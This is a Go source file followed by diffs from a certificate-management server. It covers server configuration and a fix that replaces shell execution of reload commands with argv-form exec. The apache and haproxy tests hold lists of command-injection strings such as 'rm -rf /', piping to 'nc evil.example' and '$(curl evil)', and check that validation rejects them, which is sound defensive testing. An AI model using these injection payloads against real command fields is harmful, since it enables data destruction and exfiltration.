// isLoopbackAddr() — HIGH-12 demo-mode startup guard helper.
|
||||||
|
// Returns true ONLY for 127.0.0.1 / ::1 /
|
||||||
|
// "localhost"; everything else (including
|
||||||
|
// 0.0.0.0, ::, and hostnames that aren't
|
||||||
|
// "localhost") returns false. Same-package
|
||||||
|
// caller is Validate() in config.go which
|
||||||
|
// gates Type=none on non-loopback binds.
|
||||||
|
// Test caller in config_test.go is also
|
||||||
|
// package `config` so the unexported callable
|
||||||
|
// surface stays accessible.
|
||||||
|
//
|
||||||
|
// What stayed in config.go
|
||||||
|
// ========================
|
||||||
|
// - ApprovalConfig — RBAC-related (issuance-approval workflow), not
|
||||||
|
// server-tier infrastructure. Sits between SchedulerConfig and
|
||||||
|
// LogConfig in the original file ordering; Sprint 6's two-pass
|
||||||
|
// sed deliberately preserves it where it is. Candidate for a
|
||||||
|
// future Auth/RBAC follow-up cut if the operator wants the
|
||||||
|
// approval surface adjacent to AuthConfig.
|
||||||
|
// - The Validate() body that uses isLoopbackAddr to gate
|
||||||
|
// CERTCTL_AUTH_TYPE=none — cross-cutting validation logic stays
|
||||||
|
// in config.go.
|
||||||
|
// - The Load() body that synthesizes ServerConfig / ServerTLSConfig
|
||||||
|
// / DatabaseConfig / SchedulerConfig / LogConfig / RateLimitConfig
|
||||||
|
// / CORSConfig from env vars via the shared getEnv* helpers.
|
||||||
|
// - The shared getEnv* helpers (getEnv / getEnvBool / getEnvInt /
|
||||||
|
// getEnvDuration / getEnvFloat / getEnvInt64 / getEnvList).
|
||||||
|
//
|
||||||
|
// Import-graph hygiene
|
||||||
|
// ====================
|
||||||
|
// isLoopbackAddr is the ONLY user of the `net` package in config.go.
|
||||||
|
// After this move, config.go's `net` import becomes unused; the
|
||||||
|
// Sprint 6 commit removes it from config.go's import block. server.go
|
||||||
|
// imports `net` directly. The `time` import in config.go stays:
// ApprovalConfig is not time-typed, and the SCEP/EST helpers import
// their own `time` in their respective .go files, but config.go still
// uses `time.Duration` in OCSPResponderConfig, DigestConfig,
// HealthCheckConfig, NetworkScanConfig, VerificationConfig, and the
// various issuer-specific configs that haven't been split yet.
|
||||||
|
//
|
||||||
|
// Public-surface invariant
|
||||||
|
// ========================
|
||||||
|
// Every type, exported field, and doc-comment is byte-identical to
|
||||||
|
// pre-split. Package stays `config`. Every external caller of
|
||||||
|
// `config.ServerConfig` / `config.ServerTLSConfig` / etc. resolves
|
||||||
|
// the same way. The unexported `isLoopbackAddr` is invisible to
|
||||||
|
// package consumers; its same-package caller (Validate in config.go)
|
||||||
|
// + its test (config_test.go in package `config`) continue to
|
||||||
|
// resolve via the package symbol table.
|
||||||
|
|
||||||
|
// ServerConfig contains HTTP server configuration.
|
||||||
|
type ServerConfig struct {
|
||||||
|
Host string // Server host (default: 127.0.0.1). Set via CERTCTL_SERVER_HOST.
|
||||||
|
Port int // Server port (default: 8080). Set via CERTCTL_SERVER_PORT.
|
||||||
|
MaxBodySize int64 // Maximum request body size in bytes (default: 1MB). Set via CERTCTL_MAX_BODY_SIZE.
|
||||||
|
TLS ServerTLSConfig // HTTPS-only TLS configuration. Both CertPath and KeyPath are required.
|
||||||
|
|
||||||
|
// AuditFlushTimeoutSeconds is the budget (in seconds) main.go gives the
|
||||||
|
// audit middleware to drain in-flight recordings during graceful
|
||||||
|
// shutdown. Bundle-5 / Audit M-011: pre-Bundle-5 this was hard-coded
|
||||||
|
// 30s, which dropped events silently in high-volume environments
|
||||||
|
// because the same context governed HTTP server shutdown + audit
|
||||||
|
// flush. Post-Bundle-5: configurable; default 30s preserves prior
|
||||||
|
// behaviour. WARN-log on deadline exceeded, but never exit hard.
|
||||||
|
// Setting: CERTCTL_AUDIT_FLUSH_TIMEOUT_SECONDS environment variable.
|
||||||
|
AuditFlushTimeoutSeconds int
|
||||||
|
}
|
||||||
|
|
||||||
|
// ServerTLSConfig carries the server-side TLS material.
//
// Since the HTTPS-everywhere milestone the control plane is HTTPS-only
// (§3 locked decisions: no `http` mode, no dual-listener, TLS 1.3 only).
// CertPath and KeyPath are both mandatory: an empty value makes
// Config.Validate() return a fail-loud error and the server refuses to
// start. There is no plaintext HTTP fallback, no N-release migration
// bridge, and no auto-generated self-signed cert. Operators must supply a
// cert on disk (docker-compose init container, operator-managed file,
// cert-manager mount); otherwise the process exits non-zero.
type ServerTLSConfig struct {
	// CertPath is the filesystem location of the server's PEM-encoded
	// X.509 certificate. Required.
	// Set via CERTCTL_SERVER_TLS_CERT_PATH.
	CertPath string

	// KeyPath is the filesystem location of the PEM-encoded private key
	// that signs CertPath. Required.
	// Set via CERTCTL_SERVER_TLS_KEY_PATH.
	KeyPath string
}
|
||||||
|
|
||||||
|
// DatabaseConfig groups the database connection and pool settings together
// with the DemoSeed toggle used by the compose demo overlay.
type DatabaseConfig struct {
	// URL is the database connection string.
	URL string

	// MaxConnections is the connection-pool size setting.
	MaxConnections int

	// MigrationsPath is the directory holding the migration and seed files
	// (seed_demo.sql is resolved relative to it; see DemoSeed).
	MigrationsPath string

	// DemoSeed, when true, tells the server to apply
	// `<MigrationsPath>/seed_demo.sql` after the baseline `seed.sql`.
	// Set via CERTCTL_DEMO_SEED.
	//
	// The compose demo overlay (deploy/docker-compose.demo.yml) enables it
	// so the demo path keeps working after U-3 dropped initdb-mounted seed
	// files. The seed file uses ON CONFLICT (id) DO NOTHING, so re-running
	// it against a populated database is safe. A missing file is a no-op
	// (returns nil), so a minimal-image deploy that strips seed_demo.sql
	// still boots cleanly.
	DemoSeed bool
}
|
||||||
|
|
||||||
|
// SchedulerConfig collects the scheduler-loop tunables, the per-tick
// concurrency cap, and the rate-limit / deploy / connector settings that
// ride the same env-var family.
type SchedulerConfig struct {
	// RenewalCheckInterval is the cadence at which the renewal scheduler
	// looks for expiring certs; certs are flagged for renewal at the
	// configured thresholds.
	// Default: 1 hour. Minimum: 1 minute.
	// Setting: CERTCTL_SCHEDULER_RENEWAL_CHECK_INTERVAL environment variable.
	RenewalCheckInterval time.Duration

	// JobProcessorInterval is the cadence at which the job scheduler
	// processes pending jobs. It governs issuance, renewal, and
	// deployment latency.
	// Default: 30 seconds. Minimum: 1 second.
	// Setting: CERTCTL_SCHEDULER_JOB_PROCESSOR_INTERVAL environment variable.
	JobProcessorInterval time.Duration

	// RenewalConcurrency bounds how many renewal/issuance/deployment
	// goroutines are launched concurrently per job-processor tick.
	// Default 25: high enough to benefit from HTTP/1.1 connection reuse
	// against an upstream CA, low enough to stay under typical
	// per-customer rate limits. Operators with permissive upstream limits
	// and large fleets (>10k certs) can bump it to 100; operators with
	// strict limits or async-CA-heavy fleets should keep it at 25 or
	// lower.
	//
	// Values ≤ 0 fall back to 1 (sequential), a fail-safe that avoids
	// panicking on semaphore.NewWeighted(0) semantics.
	//
	// Closes the #9 acquisition-readiness blocker from the 2026-05-01
	// issuer coverage audit. Before the fix the per-tick fan-out was
	// uncapped, so a 5k-cert sweep launched 5k in-flight HTTP calls to
	// upstream CAs and tripped DigiCert/Entrust/Sectigo rate limits.
	//
	// Setting: CERTCTL_RENEWAL_CONCURRENCY environment variable.
	RenewalConcurrency int

	// AgentHealthCheckInterval is the cadence at which the scheduler
	// inspects agent heartbeats; agents with no recent heartbeat are
	// marked offline.
	// Default: 2 minutes. Minimum: 1 second.
	// Setting: CERTCTL_SCHEDULER_AGENT_HEALTH_CHECK_INTERVAL environment variable.
	AgentHealthCheckInterval time.Duration

	// NotificationProcessInterval is the cadence at which the scheduler
	// processes pending notifications (Slack, Teams, PagerDuty, etc.).
	// Default: 1 minute. Minimum: 1 second.
	// Setting: CERTCTL_SCHEDULER_NOTIFICATION_PROCESS_INTERVAL environment variable.
	NotificationProcessInterval time.Duration

	// NotificationRetryInterval is the cadence at which the scheduler
	// retries failed notifications whose retry_count is still below the
	// service-layer 5-attempt DLQ budget.
	// Default: 2 minutes. Minimum: 1 second.
	//
	// It mirrors the I-001 RetryInterval knob: eligible Failed
	// notifications whose next_retry_at has arrived are moved back to
	// Pending so the notification processor picks them up on its next
	// tick. Closes coverage gap I-005: HEAD had no retry path for
	// transient SMTP/webhook failures, so notifications stayed Failed
	// forever.
	// Setting: CERTCTL_NOTIFICATION_RETRY_INTERVAL environment variable.
	NotificationRetryInterval time.Duration

	// RetryInterval is the cadence at which the scheduler retries failed
	// jobs whose Attempts counter is below MaxAttempts.
	// Default: 5 minutes. Minimum: 1 second.
	//
	// Eligible Failed jobs are moved back to Pending so the job processor
	// can pick them up again. Closes coverage gap I-001:
	// JobService.RetryFailedJobs had no caller before this loop was wired.
	// Setting: CERTCTL_SCHEDULER_RETRY_INTERVAL environment variable.
	RetryInterval time.Duration

	// JobTimeoutInterval is the cadence at which the reaper loop sweeps
	// AwaitingCSR and AwaitingApproval jobs for TTL expiration.
	// Default: 10 minutes. Minimum: 1 second.
	//
	// Timed-out jobs move to Failed with a descriptive error message;
	// I-001's retry loop then auto-promotes eligible Failed jobs back to
	// Pending (closes coverage gap I-003).
	// Setting: CERTCTL_JOB_TIMEOUT_INTERVAL environment variable.
	JobTimeoutInterval time.Duration

	// AwaitingCSRTimeout is the longest a job may sit in AwaitingCSR
	// before the reaper moves it to Failed. An agent that has not
	// submitted a CSR within this window is presumed unreachable.
	// Default: 24 hours. Minimum: 1 second.
	// Setting: CERTCTL_JOB_AWAITING_CSR_TIMEOUT environment variable.
	AwaitingCSRTimeout time.Duration

	// AwaitingApprovalTimeout is the longest a job may sit in
	// AwaitingApproval before the reaper moves it to Failed. Reviewers
	// who have not approved within this window force the renewal to fail
	// loudly rather than silently stall.
	// Default: 168 hours (7 days). Minimum: 1 second.
	// Setting: CERTCTL_JOB_AWAITING_APPROVAL_TIMEOUT environment variable.
	AwaitingApprovalTimeout time.Duration

	// ShortLivedExpiryCheckInterval is the cadence at which the scheduler
	// scans short-lived certificates and marks expired rows as Expired.
	// Default: 30 seconds (matches the in-memory default in
	// scheduler.NewScheduler).
	//
	// C-1 closure (cat-g-7e38f9708e20 + diff-10xmain-2bf4a0a60388):
	// before C-1 the setter scheduler.SetShortLivedExpiryCheckInterval
	// was defined and tested but never called from cmd/server/main.go,
	// so the 30-second default was effectively hardcoded and operators
	// who needed a different cadence (e.g. a high-churn short-lived cert
	// tenant) had no path. After C-1, main.go wires this knob.
	// Setting: CERTCTL_SHORT_LIVED_EXPIRY_CHECK_INTERVAL environment variable.
	ShortLivedExpiryCheckInterval time.Duration

	// CRLGenerationInterval is the cadence at which the scheduler
	// pre-generates CRLs into the crl_cache table. The
	// /.well-known/pki/crl/{issuer_id} HTTP endpoint serves from that
	// cache instead of regenerating per request.
	// Default: 1 hour.
	// Setting: CERTCTL_CRL_GENERATION_INTERVAL environment variable.
	// Bundle CRL/OCSP-Responder Phase 3.
	CRLGenerationInterval time.Duration

	// OCSPRateLimitPerIPMin is the per-source-IP ceiling on OCSP requests
	// per minute. Defaults to 1000 (production hardening II Phase 3
	// frozen decision 0.5). Zero disables the limit.
	// Setting: CERTCTL_OCSP_RATE_LIMIT_PER_IP_MIN environment variable.
	OCSPRateLimitPerIPMin int

	// CertExportRateLimitPerActorHr is the per-actor ceiling on
	// cert-export requests per hour. Defaults to 50 (production
	// hardening II Phase 3 frozen decision 0.6). Zero disables the limit.
	// Setting: CERTCTL_CERT_EXPORT_RATE_LIMIT_PER_ACTOR_HR environment variable.
	CertExportRateLimitPerActorHr int

	// DeployBackupRetention is the backup retention applied to every
	// connector's deploy.Plan unless the per-target config overrides it.
	// Defaults to 3 (deploy-hardening I frozen decision 0.2). Setting it
	// to -1 disables backups entirely, which makes rollback impossible
	// (documented foot-gun).
	// Setting: CERTCTL_DEPLOY_BACKUP_RETENTION environment variable.
	DeployBackupRetention int

	// K8sDeployKubeletSyncTimeout is how long the k8ssecret connector
	// waits, after a Secret update, for kubelet sync
	// (Pod.Status.ContainerStatuses indicating the new Secret has been
	// mounted) before timing out the post-deploy verify.
	// Defaults to 60s.
	// Setting: CERTCTL_K8S_DEPLOY_KUBELET_SYNC_TIMEOUT environment variable.
	// Deploy-hardening I Phase 9.
	K8sDeployKubeletSyncTimeout time.Duration
}
|
||||||
|
|
||||||
|
// LogConfig selects the log verbosity and output encoding.
type LogConfig struct {
	// Level is the minimum severity that gets emitted.
	// Valid values: "debug" (verbose), "info" (default), "warn" (warnings),
	// "error" (errors only).
	// Setting: CERTCTL_LOG_LEVEL environment variable. Default: "info".
	Level string

	// Format is the encoding used for log output.
	// Valid values: "json" (structured, for parsing), "text" (human-readable).
	// Setting: CERTCTL_LOG_FORMAT environment variable. Default: "json".
	Format string
}
|
||||||
|
|
||||||
|
// RateLimitConfig holds the API rate-limiting settings.
//
// Bundle B / Audit M-025 (OWASP ASVS L2 §11.2.1): before the bundle the
// limiter was global, a single token bucket shared across every request.
// It is now per-key, with separate budgets for IP-keyed and user-keyed
// buckets. RPS / BurstSize are PER-KEY budgets.
type RateLimitConfig struct {
	// Enabled determines whether rate limiting is enforced on API
	// endpoints. Default: true. Setting it to false disables rate limits
	// (not recommended for production).
	// Setting: CERTCTL_RATE_LIMIT_ENABLED environment variable.
	Enabled bool

	// RPS is the requests-per-second refill rate of the token bucket,
	// applied PER KEY. Unauthenticated callers are keyed by source IP;
	// authenticated callers are keyed by API-key name (the UserKey
	// context value populated by NewAuthWithNamedKeys).
	// Default: 50. Higher values permit more sustained throughput per
	// key; lower values restrict load.
	// Setting: CERTCTL_RATE_LIMIT_RPS environment variable.
	RPS float64

	// BurstSize is the largest number of requests admitted in a single
	// burst; clients may briefly exceed RPS while BurstSize tokens are
	// available. Must be at least as large as RPS. Higher values mean
	// more lenient burst handling.
	// Default: 100.
	// Setting: CERTCTL_RATE_LIMIT_BURST environment variable.
	BurstSize int

	// PerUserRPS replaces RPS for authenticated callers. When zero, RPS
	// applies to both keying dimensions. Set it above RPS to give
	// authenticated clients a more generous budget than anonymous probes.
	// Default: 0 (use RPS).
	// Setting: CERTCTL_RATE_LIMIT_PER_USER_RPS environment variable.
	PerUserRPS float64

	// PerUserBurstSize replaces BurstSize for authenticated callers.
	// When zero, BurstSize is used. Default: 0 (use BurstSize).
	// Setting: CERTCTL_RATE_LIMIT_PER_USER_BURST environment variable.
	PerUserBurstSize int

	// SlidingWindowBackend chooses the backend behind the per-key
	// sliding-window-log limiters wired in cmd/server/main.go
	// (break-glass login, OCSP per-IP, cert-export per-actor, EST
	// per-principal, EST failed-basic source-IP). This is separate from
	// the token-bucket fields above: those are middleware RPS limits
	// applied to every request via the http handler chain, whereas this
	// field controls the sliding-window-log primitive used by
	// authenticated-but-shared-credential code paths.
	//
	// Valid values:
	//   "memory"   — per-process, sync.Mutex-guarded map (historical
	//                default; perfect for single-replica deploys).
	//   "postgres" — cross-replica-consistent via the
	//                rate_limit_buckets table (migration 000046).
	//                SELECT FOR UPDATE arbitrates per-key access
	//                across the cluster. Adds ~2 DB round-trips per
	//                Allow call; acceptable on the gated hot path.
	//
	// Default: "memory". HA deploys with server.replicas > 1 should
	// switch to "postgres" so that a 2-replica deployment doesn't
	// effectively double the per-key cap.
	//
	// Phase 13 Sprint 13.2/13.3 closure (architecture diligence audit
	// ARCH-M1). See docs/operator/observability.md.
	//
	// Setting: CERTCTL_RATE_LIMIT_BACKEND environment variable.
	SlidingWindowBackend string

	// SlidingWindowJanitorInterval is the cadence at which the scheduler
	// sweeps stale rows out of rate_limit_buckets. A row counts as stale
	// once its updated_at is older than the longest window any caller
	// configures (currently 24h for the EST per-principal limiter).
	// Default: 5 minutes. Minimum: 1 minute. It is a no-op when
	// SlidingWindowBackend = "memory", because the in-memory backend's
	// prune-on-Allow path keeps buckets short-lived without a separate
	// sweep.
	//
	// Setting: CERTCTL_RATE_LIMIT_JANITOR_INTERVAL environment variable.
	SlidingWindowJanitorInterval time.Duration
}
|
||||||
|
|
||||||
|
// CORSConfig contains CORS configuration.
|
||||||
|
type CORSConfig struct {
	// AllowedOrigins enumerates the origins permitted to make CORS
	// requests. Interpretation of the value:
	//
	//   - empty (the security default): every CORS request is denied,
	//     i.e. same-origin only;
	//   - ["*"]: every origin is allowed — development/demo mode only,
	//     this is a security risk;
	//   - explicit entries (e.g. ["https://app.example.com"]): only the
	//     listed origins are allowed.
	AllowedOrigins []string
}
|
||||||
|
|
||||||
|
// isLoopbackAddr reports whether host names a loopback-only bind
// address (an IP in 127.0.0.0/8, ::1, or the literal "localhost").
// Used by the HIGH-12 demo-mode startup guard to refuse non-loopback
// binds when CERTCTL_AUTH_TYPE=none is in effect.
//
// Accepted spellings:
//
//   - a bare host:               "127.0.0.1", "::1", "localhost"
//   - a host:port pair:          "127.0.0.1:8443", "[::1]:8443", "localhost:8443"
//   - a bracketed IPv6 literal:  "[::1]"
//
// "" (unset) and the unspecified addresses "0.0.0.0" / "::" / "[::]"
// return false because those surface the listener to every interface —
// exactly the misconfiguration the guard is designed to catch.
//
// Hostnames other than "localhost" return false defensively: a hostname
// could resolve to a non-loopback IP at runtime; no DNS lookup is
// performed here because the guard runs at startup before any network
// state is available, and a misconfigured /etc/hosts must not silently
// pass the guard. Operators wanting to bind to a non-default loopback
// alias must either use 127.0.0.1 / ::1 directly or set
// CERTCTL_DEMO_MODE_ACK=true.
func isLoopbackAddr(host string) bool {
	// Strip a trailing :port if the operator passed a host:port pair
	// rather than a bare host (defensive — Server.Host is documented as
	// host-only, but be lenient). SplitHostPort also removes the
	// brackets of "[v6]:port". It fails for bare hosts, in which case
	// host is left untouched.
	if h, _, err := net.SplitHostPort(host); err == nil {
		host = h
	}

	switch host {
	case "":
		// Empty / unset host (or a bare ":port") — Go's net/http.Server
		// treats this as "all interfaces" (equivalent to 0.0.0.0).
		// Surfaced to the network → not loopback.
		return false
	case "localhost":
		// Checked after the port strip so that "localhost" and
		// "localhost:8443" are classified the same way.
		return true
	}

	// A bracketed IPv6 literal without a port ("[::1]", "[::]") is
	// rejected by SplitHostPort for lacking a port, so unwrap it here
	// before handing it to ParseIP, which does not understand brackets.
	if n := len(host); n > 2 && host[0] == '[' && host[n-1] == ']' {
		host = host[1 : n-1]
	}

	// IP literal: loopback ranges pass; everything else, including the
	// unspecified addresses 0.0.0.0 and ::, is rejected.
	if ip := net.ParseIP(host); ip != nil {
		return ip.IsLoopback()
	}

	// Hostname that isn't "localhost" — fail closed.
	return false
}
|
||||||
@@ -112,6 +112,49 @@ const (
|
|||||||
DefaultJitterPct = 0.2
|
DefaultJitterPct = 0.2
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-M3 closure (2026-05-14): operator-overridable global
|
||||||
|
// default for the package-level MaxWait fallback. Priority chain for
|
||||||
|
// every Poll() call:
|
||||||
|
//
|
||||||
|
// 1. cfg.MaxWait > 0 → per-call value (set by the caller, usually
|
||||||
|
// from a per-connector env like CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS)
|
||||||
|
// 2. effectiveDefaultMaxWait != nil → process-wide override set via
|
||||||
|
// SetDefaultMaxWait (from CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS at
|
||||||
|
// server boot)
|
||||||
|
// 3. DefaultMaxWait constant (10 minutes)
|
||||||
|
//
|
||||||
|
// Pre-Phase-6, paths (1) + (3) existed. Path (2) lets an operator tune
|
||||||
|
// the global fallback in one place without setting four per-connector
|
||||||
|
// envs (digicert, entrust, globalsign, sectigo).
|
||||||
|
var effectiveDefaultMaxWait *time.Duration
|
||||||
|
|
||||||
|
// SetDefaultMaxWait overrides the package-level DefaultMaxWait
|
||||||
|
// fallback for the rest of the process lifetime. Intended to be
|
||||||
|
// called exactly once at boot from cmd/server/main.go after reading
|
||||||
|
// CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS. Subsequent calls overwrite the
|
||||||
|
// previous override. A zero or negative duration clears the override
|
||||||
|
// (restoring the constant default).
|
||||||
|
//
|
||||||
|
// Per-connector overrides (caller-provided cfg.MaxWait) take
|
||||||
|
// precedence over this global default.
|
||||||
|
func SetDefaultMaxWait(d time.Duration) {
|
||||||
|
if d <= 0 {
|
||||||
|
effectiveDefaultMaxWait = nil
|
||||||
|
return
|
||||||
|
}
|
||||||
|
effectiveDefaultMaxWait = &d
|
||||||
|
}
|
||||||
|
|
||||||
|
// currentDefaultMaxWait returns the effective default — the
|
||||||
|
// SetDefaultMaxWait override if one is in place, else the package's
|
||||||
|
// DefaultMaxWait constant.
|
||||||
|
func currentDefaultMaxWait() time.Duration {
|
||||||
|
if effectiveDefaultMaxWait != nil {
|
||||||
|
return *effectiveDefaultMaxWait
|
||||||
|
}
|
||||||
|
return DefaultMaxWait
|
||||||
|
}
|
||||||
|
|
||||||
// Poll runs fn with exponential backoff + jitter until Done, Failed,
|
// Poll runs fn with exponential backoff + jitter until Done, Failed,
|
||||||
// MaxWait, or ctx cancellation.
|
// MaxWait, or ctx cancellation.
|
||||||
//
|
//
|
||||||
@@ -132,7 +175,7 @@ const (
|
|||||||
// error in case MaxWait or ctx-cancel later fires.
|
// error in case MaxWait or ctx-cancel later fires.
|
||||||
func Poll(ctx context.Context, cfg Config, fn PollFunc) (Result, error) {
|
func Poll(ctx context.Context, cfg Config, fn PollFunc) (Result, error) {
|
||||||
if cfg.MaxWait <= 0 {
|
if cfg.MaxWait <= 0 {
|
||||||
cfg.MaxWait = DefaultMaxWait
|
cfg.MaxWait = currentDefaultMaxWait()
|
||||||
}
|
}
|
||||||
if cfg.InitialWait <= 0 {
|
if cfg.InitialWait <= 0 {
|
||||||
cfg.InitialWait = DefaultInitialWait
|
cfg.InitialWait = DefaultInitialWait
|
||||||
|
|||||||
@@ -107,8 +107,17 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
return c
|
return c
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead of
|
||||||
|
// `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// rationale + threat model. ValidateShellCommand at config-time +
|
||||||
|
// SplitShellCommand at exec-time provide defense in depth; the argv
|
||||||
|
// exec is what actually eliminates the injection vector.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
cmd := exec.CommandContext(ctx, "sh", "-c", command)
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
|
||||||
return cmd.CombinedOutput()
|
return cmd.CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -198,3 +198,45 @@ func TestApacheConnector_ValidateDeployment(t *testing.T) {
|
|||||||
}
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 (2026-05-14): pin the config-time injection guard.
|
||||||
|
// Every shell metacharacter that ValidateShellCommand rejects MUST
|
||||||
|
// surface as a ValidateConfig error before the connector ever
|
||||||
|
// reaches defaultRunCommand. Pre-Phase-7 a malicious string would
|
||||||
|
// have been caught at the same gate; post-Phase-7 the same string
|
||||||
|
// is ALSO rejected at exec-time via SplitShellCommand
|
||||||
|
// (defense-in-depth) — but the config layer is the load-bearing
|
||||||
|
// check that prevents the persisted config from carrying an
|
||||||
|
// exploit payload in the first place.
|
||||||
|
func TestApacheConnector_ValidateConfig_RejectsCommandInjection(t *testing.T) {
|
||||||
|
logger := slog.New(slog.NewTextHandler(os.Stdout, &slog.HandlerOptions{Level: slog.LevelDebug}))
|
||||||
|
ctx := context.Background()
|
||||||
|
tmpDir := t.TempDir()
|
||||||
|
certPath := filepath.Join(tmpDir, "cert.pem")
|
||||||
|
if err := os.WriteFile(certPath, []byte("cert"), 0644); err != nil {
|
||||||
|
t.Fatalf("setup cert: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
maliciousCommands := []string{
|
||||||
|
"apachectl graceful; rm -rf /", // semicolon-chain
|
||||||
|
"apachectl graceful | nc evil.example", // pipe
|
||||||
|
"apachectl graceful $(curl evil)", // command substitution
|
||||||
|
"apachectl graceful `whoami`", // backtick substitution
|
||||||
|
"apachectl graceful & malware", // background spawn
|
||||||
|
"apachectl graceful > /etc/passwd", // output redirection
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, cmd := range maliciousCommands {
|
||||||
|
t.Run(cmd, func(t *testing.T) {
|
||||||
|
rawCfg, _ := json.Marshal(apache.Config{
|
||||||
|
CertPath: certPath,
|
||||||
|
ReloadCommand: cmd,
|
||||||
|
ValidateCommand: "apachectl configtest",
|
||||||
|
})
|
||||||
|
c := apache.New(nil, logger)
|
||||||
|
if err := c.ValidateConfig(ctx, rawCfg); err == nil {
|
||||||
|
t.Errorf("ValidateConfig accepted malicious ReloadCommand %q; want injection-rejection error", cmd)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
@@ -86,8 +86,17 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
return c
|
return c
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead of
|
||||||
|
// `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// rationale + threat model. ValidateShellCommand at config-time +
|
||||||
|
// SplitShellCommand at exec-time provide defense in depth; the argv
|
||||||
|
// exec is what actually eliminates the injection vector.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
cmd := exec.CommandContext(ctx, "sh", "-c", command)
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
|
||||||
return cmd.CombinedOutput()
|
return cmd.CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -201,3 +201,44 @@ func TestHAProxyConnector_ValidateDeployment(t *testing.T) {
|
|||||||
}
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 (2026-05-14): config-time injection guard.
|
||||||
|
// See apache + nginx tests for the same shape; haproxy mirrors the
|
||||||
|
// pattern. Every shell metacharacter that ValidateShellCommand
|
||||||
|
// rejects MUST surface as a ValidateConfig error before the
|
||||||
|
// connector ever reaches defaultRunCommand.
|
||||||
|
func TestHAProxyConnector_ValidateConfig_RejectsCommandInjection(t *testing.T) {
|
||||||
|
logger := slog.New(slog.NewTextHandler(os.Stdout, &slog.HandlerOptions{Level: slog.LevelDebug}))
|
||||||
|
ctx := context.Background()
|
||||||
|
tmpDir := t.TempDir()
|
||||||
|
pemPath := filepath.Join(tmpDir, "combined.pem")
|
||||||
|
if err := os.WriteFile(pemPath, []byte("pem"), 0644); err != nil {
|
||||||
|
t.Fatalf("setup pem: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
maliciousCommands := []string{
|
||||||
|
"systemctl reload haproxy; rm -rf /", // semicolon-chain
|
||||||
|
"systemctl reload haproxy | nc evil.example", // pipe
|
||||||
|
"systemctl reload haproxy $(curl evil)", // command substitution
|
||||||
|
"systemctl reload haproxy `whoami`", // backtick substitution
|
||||||
|
"systemctl reload haproxy & malware", // background spawn
|
||||||
|
"systemctl reload haproxy > /etc/passwd", // output redirection
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, cmd := range maliciousCommands {
|
||||||
|
// Phase 7: ensure 'strings' import stays referenced so the
|
||||||
|
// existing file's unused-import wouldn't break the build if
|
||||||
|
// the upstream test ever drops its only strings.* usage.
|
||||||
|
_ = strings.TrimSpace(cmd)
|
||||||
|
t.Run(cmd, func(t *testing.T) {
|
||||||
|
rawCfg, _ := json.Marshal(haproxy.Config{
|
||||||
|
PEMPath: pemPath,
|
||||||
|
ReloadCommand: cmd,
|
||||||
|
})
|
||||||
|
c := haproxy.New(nil, logger)
|
||||||
|
if err := c.ValidateConfig(ctx, rawCfg); err == nil {
|
||||||
|
t.Errorf("ValidateConfig accepted malicious ReloadCommand %q; want injection-rejection error", cmd)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
@@ -361,10 +361,24 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Step 5: Optional reload command
|
// Step 5: Optional reload command
|
||||||
|
//
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead
|
||||||
|
// of `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// shared rationale. ValidateShellCommand was already called at
|
||||||
|
// config-time (line 178 above); SplitShellCommand re-validates
|
||||||
|
// here as defense-in-depth and produces the argv for
|
||||||
|
// executor.Execute(name, args...) — note the executor's
|
||||||
|
// signature was already variadic-args, so the migration was
|
||||||
|
// purely "split and unpack."
|
||||||
if c.config.ReloadCommand != "" {
|
if c.config.ReloadCommand != "" {
|
||||||
output, err := c.executor.Execute(ctx, "sh", "-c", c.config.ReloadCommand)
|
argv, err := validation.SplitShellCommand(c.config.ReloadCommand)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
c.logger.Warn("reload command failed (non-fatal)", "error", err, "output", output)
|
c.logger.Warn("reload command failed validation (non-fatal)", "error", err)
|
||||||
|
} else {
|
||||||
|
output, runErr := c.executor.Execute(ctx, argv[0], argv[1:]...)
|
||||||
|
if runErr != nil {
|
||||||
|
c.logger.Warn("reload command failed (non-fatal)", "error", runErr, "output", output)
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
